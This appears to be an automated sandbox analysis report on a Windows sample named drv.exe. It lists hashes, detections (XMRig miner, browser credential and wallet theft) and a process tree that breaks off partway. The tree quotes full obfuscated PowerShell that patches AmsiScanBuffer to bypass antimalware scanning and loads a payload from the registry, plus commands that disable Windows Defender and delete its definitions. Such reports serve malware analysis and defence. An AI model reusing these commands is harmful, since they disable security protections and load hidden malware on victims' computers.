Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-uk
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-uklocale:uk-uaos:windows10-2004-x64systemwindows
  • submitted
    20-11-2024 15:49

General

  • Target

    drv.exe

  • Size

    9.2MB

  • MD5

    7847274fd4b59430dbf28f58cc80fd4b

  • SHA1

    c7301085fae2ebbc3bab0508f9ab008e11b39df7

  • SHA256

    20166874773083c8543bf0ad5d29933cc8a549c99537ef5c843316704a603e2e

  • SHA512

    9411130993f2fc3c0293414529c0c99a8023f097aabe962337534b92e35e7f2fcf123806cbdcc87c3792fbd48440437ca3be224824d80618b3fd37f0035f58de

  • SSDEEP

    196608:C9K/OiZn75u+rC2x47P/4JkyCT2SwCvWSEjnXuwHo102YFCVQGk:C9KBerL4JLCuSnwHt2JE

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Drops file in Drivers directory 5 IoCs
  • Stops running service(s) 4 TTPs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 32 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 15 IoCs
  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • UPX packed file 55 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:620
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:64
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{f745795d-2394-4f56-9d66-0957897cbb8b}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4688
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{15e914fe-36e5-4833-aa8a-3e0033d5d80b}
          2⤵
            PID:3444
        • C:\Windows\system32\lsass.exe
          C:\Windows\system32\lsass.exe
          1⤵
            PID:676
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
            1⤵
              PID:952
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
              1⤵
                PID:448
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                1⤵
                  PID:896
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  1⤵
                    PID:1060
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                    1⤵
                      PID:1072
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                        PID:1148
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                        1⤵
                          PID:1160
                          • C:\Windows\system32\taskhostw.exe
                            taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                            2⤵
                              PID:696
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XFgFmeemoawa{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$qAstYAVqONConG,[Parameter(Position=1)][Type]$zJmdYJBAJO)$AdjRsvIxxdC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+'t'+''+[Char](101)+'d'+[Char](68)+'e'+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+'e'+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+'M'+'o'+[Char](100)+''+'u'+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+'e'+'le'+[Char](103)+'a'+'t'+'e'+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'','Cl'+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+'l'+[Char](105)+''+'c'+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+'d'+''+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'to'+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$AdjRsvIxxdC.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+'B'+'y'+''+[Char](83)+''+'i'+''+'g'+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$qAstYAVqONConG).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+'i'+''+'m'+'e'+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$AdjRsvIxxdC.DefineMethod(''+[Char](73)+''+'n'+''+'v'+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+',Hi'+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+'e'+[Char](119)+''+'S'+'l'+[Char](111)+'t,'+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$zJmdYJBAJO,$qAstYAVqONConG).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+'im'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+'d');Write-Output $AdjRsvIxxdC.CreateType();}$GGZgXXhPBtOyQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+'m'+'.d'+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+'f'+[Char](116)+'.'+'W'+'i'+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+''+[Char](110)+'saf'+[Char](101)+'N'+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+'e'+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$FqNHAWFSJJkfjB=$GGZgXXhPBtOyQ.GetMethod('G'+'e'+''+'t'+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+'d'+'d'+''+[Char](114)+''+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+'t'+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$xGtogTqcmgMvIQSxzVD=XFgFmeemoawa @([String])([IntPtr]);$KNYzSootCpKXZbwjzJzDBP=XFgFmeemoawa @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$eEHYVMfaJSx=$GGZgXXhPBtOyQ.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'Mo'+'d'+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+'le').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+'n'+''+[Char](101)+''+'l'+''+[Char](51)+''+[Char](50)+''+[Char](46)+'d'+[Char](108)+'l')));$HfqFJYdBWvGSFO=$FqNHAWFSJJkfjB.Invoke($Null,@([Object]$eEHYVMfaJSx,[Object](''+[Char](76)+''+'o'+'a'+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+'A')));$JbxXTPirEeBHMHKou=$FqNHAWFSJJkfjB.Invoke($Null,@([Object]$eEHYVMfaJSx,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+'rot'+'e'+'c'+[Char](116)+'')));$gOJiMtR=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HfqFJYdBWvGSFO,$xGtogTqcmgMvIQSxzVD).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+'i'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');$ZSeGpvahcAkauwSjT=$FqNHAWFSJJkfjB.Invoke($Null,@([Object]$gOJiMtR,[Object](''+'A'+''+[Char](109)+''+'s'+'iS'+[Char](99)+''+'a'+'nB'+'u'+''+'f'+''+[Char](102)+'e'+[Char](114)+'')));$rJYxBqAAdo=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JbxXTPirEeBHMHKou,$KNYzSootCpKXZbwjzJzDBP).Invoke($ZSeGpvahcAkauwSjT,[uint32]8,4,[ref]$rJYxBqAAdo);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ZSeGpvahcAkauwSjT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JbxXTPirEeBHMHKou,$KNYzSootCpKXZbwjzJzDBP).Invoke($ZSeGpvahcAkauwSjT,[uint32]8,0x20,[ref]$rJYxBqAAdo);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+'R'+'E').GetValue('d'+'i'+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](114)+'s'+[Char](116)+''+'a'+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                              2⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • Command and Scripting Interpreter: PowerShell
                              • Drops file in System32 directory
                              • Suspicious use of SetThreadContext
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3280
                              • C:\Windows\System32\Conhost.exe
                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                3⤵
                                  PID:220
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:sEbmbYWMvGaX{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZwvVXRMsTyWIBO,[Parameter(Position=1)][Type]$TQhNiimrUQ)$TEfDjyFZEVf=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+'e'+'c'+''+'t'+''+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'Me'+[Char](109)+''+'o'+''+'r'+''+[Char](121)+''+[Char](77)+''+'o'+'d'+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'Typ'+'e'+'',''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+','+'P'+'u'+''+'b'+''+'l'+'i'+[Char](99)+','+[Char](83)+''+'e'+'a'+[Char](108)+''+'e'+''+'d'+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+''+[Char](67)+''+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+'t'+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+'ss',[MulticastDelegate]);$TEfDjyFZEVf.DefineConstructor('RT'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+'a'+''+[Char](108)+''+'N'+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+[Char](121)+''+[Char](83)+'i'+'g'+','+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$ZwvVXRMsTyWIBO).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+','+''+'M'+'a'+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');$TEfDjyFZEVf.DefineMethod(''+'I'+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+','+''+'H'+'i'+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+'Vir'+'t'+''+[Char](117)+'al',$TQhNiimrUQ,$ZwvVXRMsTyWIBO).SetImplementationFlags(''+[Char](82)+''+'u'+'nti'+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+'ag'+[Char](101)+'d');Write-Output $TEfDjyFZEVf.CreateType();}$uSpRxVGOJArQP=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+[Char](116)+'e'+'m'+''+[Char](46)+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+''+[Char](111)+'so'+'f'+''+'t'+''+[Char](46)+''+[Char](87)+''+'i'+'n'+'3'+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+[Char](100)+''+'s'+'');$zrMgQnPgEjtIuw=$uSpRxVGOJArQP.GetMethod(''+'G'+''+'e'+'t'+'P'+''+'r'+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+''+'d'+'r'+'e'+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+'P'+'ub'+'l'+''+'i'+''+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+'t'+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$mNSQGuITyeoQtkeCGZk=sEbmbYWMvGaX @([String])([IntPtr]);$QQBYwVeIDCkScXEOGwNuNb=sEbmbYWMvGaX @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$AIeQBMOBtwM=$uSpRxVGOJArQP.GetMethod(''+'G'+'et'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+'le').Invoke($Null,@([Object]('ke'+'r'+''+[Char](110)+''+[Char](101)+''+'l'+''+'3'+''+[Char](50)+''+'.'+''+'d'+''+[Char](108)+'l')));$vLeVVpppUXADGS=$zrMgQnPgEjtIuw.Invoke($Null,@([Object]$AIeQBMOBtwM,[Object]('L'+[Char](111)+'a'+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+''+'r'+''+[Char](121)+''+'A'+'')));$PbPEygtiHFbdYPgfm=$zrMgQnPgEjtIuw.Invoke($Null,@([Object]$AIeQBMOBtwM,[Object](''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+'l'+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$DhxtnGE=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vLeVVpppUXADGS,$mNSQGuITyeoQtkeCGZk).Invoke(''+'a'+''+'m'+''+'s'+''+'i'+''+'.'+''+[Char](100)+''+[Char](108)+'l');$DIPBTEoEMLKKvwwCx=$zrMgQnPgEjtIuw.Invoke($Null,@([Object]$DhxtnGE,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+'ca'+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$bBQaJFggVT=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PbPEygtiHFbdYPgfm,$QQBYwVeIDCkScXEOGwNuNb).Invoke($DIPBTEoEMLKKvwwCx,[uint32]8,4,[ref]$bBQaJFggVT);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$DIPBTEoEMLKKvwwCx,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PbPEygtiHFbdYPgfm,$QQBYwVeIDCkScXEOGwNuNb).Invoke($DIPBTEoEMLKKvwwCx,[uint32]8,0x20,[ref]$bBQaJFggVT);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'FT'+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+'i'+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](114)+''+[Char](115)+''+'t'+'a'+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                                2⤵
                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                • Command and Scripting Interpreter: PowerShell
                                • Drops file in System32 directory
                                • Suspicious use of SetThreadContext
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                PID:912
                                • C:\Windows\System32\Conhost.exe
                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  3⤵
                                    PID:1040
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                1⤵
                                  PID:1240
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                  1⤵
                                    PID:1264
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                    1⤵
                                      PID:1364
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                      1⤵
                                        PID:1408
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                        1⤵
                                          PID:1424
                                          • C:\Windows\system32\sihost.exe
                                            sihost.exe
                                            2⤵
                                              PID:2768
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                            1⤵
                                              PID:1584
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                              1⤵
                                                PID:1596
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                1⤵
                                                  PID:1636
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                  1⤵
                                                    PID:1708
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                    1⤵
                                                      PID:1748
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                      1⤵
                                                        PID:1808
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        1⤵
                                                          PID:1864
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                          1⤵
                                                            PID:2032
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                            1⤵
                                                              PID:2040
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                              1⤵
                                                                PID:996
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                1⤵
                                                                  PID:1952
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                  1⤵
                                                                    PID:2076
                                                                  • C:\Windows\System32\spoolsv.exe
                                                                    C:\Windows\System32\spoolsv.exe
                                                                    1⤵
                                                                      PID:2152
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                      1⤵
                                                                        PID:2224
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                        1⤵
                                                                          PID:2320
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                          1⤵
                                                                            PID:2516
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                            1⤵
                                                                              PID:2524
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                              1⤵
                                                                              • Drops file in System32 directory
                                                                              PID:2668
                                                                            • C:\Windows\sysmon.exe
                                                                              C:\Windows\sysmon.exe
                                                                              1⤵
                                                                                PID:2720
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                1⤵
                                                                                  PID:2728
                                                                                • C:\Windows\System32\svchost.exe
                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                  1⤵
                                                                                    PID:2776
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                    1⤵
                                                                                      PID:2864
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                      1⤵
                                                                                        PID:2904
                                                                                      • C:\Windows\system32\wbem\unsecapp.exe
                                                                                        C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                        1⤵
                                                                                          PID:1032
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                          1⤵
                                                                                            PID:3140
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                            1⤵
                                                                                              PID:3384
                                                                                            • C:\Windows\Explorer.EXE
                                                                                              C:\Windows\Explorer.EXE
                                                                                              1⤵
                                                                                                PID:3508
                                                                                                • C:\Users\Admin\AppData\Local\Temp\drv.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\drv.exe"
                                                                                                  2⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:3616
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\onefile_3616_133765918354174974\Loader2.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\drv.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:112
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\upinstall.exe
                                                                                                      4⤵
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:4020
                                                                                                      • C:\Users\Admin\AppData\upinstall.exe
                                                                                                        C:\Users\Admin\AppData\upinstall.exe
                                                                                                        5⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:2636
                                                                                                        • C:\Users\Admin\AppData\upinstall.exe
                                                                                                          C:\Users\Admin\AppData\upinstall.exe
                                                                                                          6⤵
                                                                                                          • Drops file in Drivers directory
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:4796
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\upinstall.exe'"
                                                                                                            7⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:1776
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\upinstall.exe'
                                                                                                              8⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:2644
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                            7⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:3328
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                              8⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:1320
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                            7⤵
                                                                                                            • Suspicious use of WriteProcessMemory
